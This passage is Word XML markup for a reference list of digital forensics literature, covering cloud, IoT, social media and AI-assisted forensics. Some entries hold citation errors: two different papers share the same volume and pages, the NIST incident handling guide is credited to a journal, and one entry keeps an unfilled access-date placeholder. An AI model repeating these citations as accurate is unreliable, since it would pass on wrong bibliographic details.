      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] A. Aminnezhad and A. Dehghantanha, "A survey on privacy issues in digital forensics," International Journal of Cyber-Security and Digital Forensics (IJCSDF), vol. 3, no. 4, pp. 183-199, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] F. Dezfouli and A. Dehghantanha, "Digital forensics trends and future," International Journal of Cyber-Security and Digital Forensics (IJCSDF), vol. 3, no. 4, pp. 183-199, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] B. K. Sharma, M. A. Joseph, B. Jacob, and L. C. B. Miranda, "Emerging trends in Digital Forensic and Cybersecurity-An Overview," in 2019 Sixth HCT Information Technology Trends (ITT), pp. 309-313, Nov. 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] M. Wazid, A. Katal, R. H. Goudar, and S. Rao, "Hacktivism trends, digital forensic tools, and challenges: A survey," in 2013 IEEE Conference on Information &amp; Communication Technologies, pp. 138-144, Apr. 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] A. Pichan, M. Lazarescu, and S. T. Soh, "Cloud forensics: Technical challenges, solutions, and comparative analysis," Digital Investigation, vol. 13, pp. 38-57, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] S. Zawoad and R. Hasan, "Cloud forensics: a meta-study of challenges, approaches, and open problems," arXiv preprint arXiv:1302.6312, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] A. Aminnezhad, A. Dehghantanha, M. T. Abdullah, and M. Damshenas, "Cloud forensics issues and opportunities," International Journal of Information Processing and Management, vol. 4, no. 4, p. 76, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] A. E. A. Rocha, "Authorship attribution for social media forensics," IEEE Transactions on Information Forensics and Security, vol. 12, no. 1, pp. 5-33, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] I. Baggili and F. Breitinger, "Data sources for advancing cyber forensics: what the social world has to offer," in 2015 AAAI Spring Symposium Series, Mar. 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] N. Al Mutawa, I. Baggili, and A. Marrington, "Forensic analysis of social networking applications on mobile devices," Digital Investigation, vol. 9, pp. S24-S33, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[12] M. Zampoglou, S. Papadopoulos, Y. Kompatsiaris, R. Bouwmeester, and J. Spangenberg, "Web and social media image forensics for news professionals," in Tenth International AAAI Conference on Web and Social Media, Apr. 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[13] A. Zanella, N. Bui, A. Castellani, L. Vangelista, and M. Zorzi, "Internet of things for smart cities," IEEE Internet of Things Journal, vol. 1, no. 1, pp. 22-32, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[14] M. Vangeti, S. K. Yadav, and V. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pinnti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, "Advantages of Internet of Things (IoT) for developing smart services in manufacturing business," Purakala with ISSN 0971-2143 is an UGC CARE Journal, vol. 31, no. 25, pp. 62-68, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] A. MacDermott, T. Baker, and Q. Shi, "IoT forensics: Challenges for the IoA era," in 2018 9th IFIP International Conference on New Technologies, Mobility and Security (NTMS), pp. 1-5, Feb. 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[16] R. Hegarty, D. J. Lamb, and A. Attwood, "Digital Evidence Challenges in the Internet of Things," in INC, pp. 163-172, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[17] N. M. Karie and H. S. Venter, "Taxonomy of challenges for digital forensics," Journal of Forensic Sciences, vol. 60, no. 4, pp. 885-893, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[18] A. M. Balogun and S. Y. Zhu, "Privacy impacts of data encryption on the efficiency of digital forensics technology," arXiv preprint arXiv:1312.3183, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[19] E. A. Vincze, "Challenges in digital forensics," Police Practice and Research, vol. 17, no. 2, pp. 183-194, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[20] S. Raghavan, "Digital forensic research: current state of the art," CSI Transactions on ICT, vol. 1, no. 1, pp. 91-114, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[21] P. Cichonski, T. Millar, T. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and K. Scarfone, "Computer security incident handling guide," International Journal of Computer Research, vol. 20, no. 4, p. 459, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[22] Z. Baig, P. Szewczyk, C. Valli, P. Rabadia, P. Hannay, M. Chernyshev, M. Johnstone, P. Kerai, A. Ibrahim, K. Sansurooah, and N. Syed, "Future challenges for smart cities: Cyber-security and digital forensics," Digital Investigation, vol. 22, pp. 3-13, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] N. Rahim, W. A. Wahab, Y. I. Idris, and L. M. Kiah, "Digital Forensics: An Overview of the Current Trends," 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[24] F. Mitchell, "The use of Artificial Intelligence in digital forensics: An introduction," Digital Evidence &amp; Electronic Signature Law Review, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[25] A. Irons and H. S. Lallie, "Digital forensics to intelligent forensics," Future Internet, vol. 6, no. 3, pp. 584-596, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[26] A. K. Muda, Y. H. Choo, A. Abraham, and S. N. Srihari, "Computational intelligence in digital forensics: Forensic investigation and applications," Springer International Publishing, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[27] O. M. Adedayo, "Big data and digital forensics," in 2016 IEEE International Conference on Cybercrime and Computer Forensic (ICCCF), IEEE, pp. 1-7, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[28] Available online: Digital Forensics Market Size 2023 Forecasting, [online] [Accessed: Date]. URL: https://www.linkedin.com/pulse/digital-forensics-market-size-2023-forecasting/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
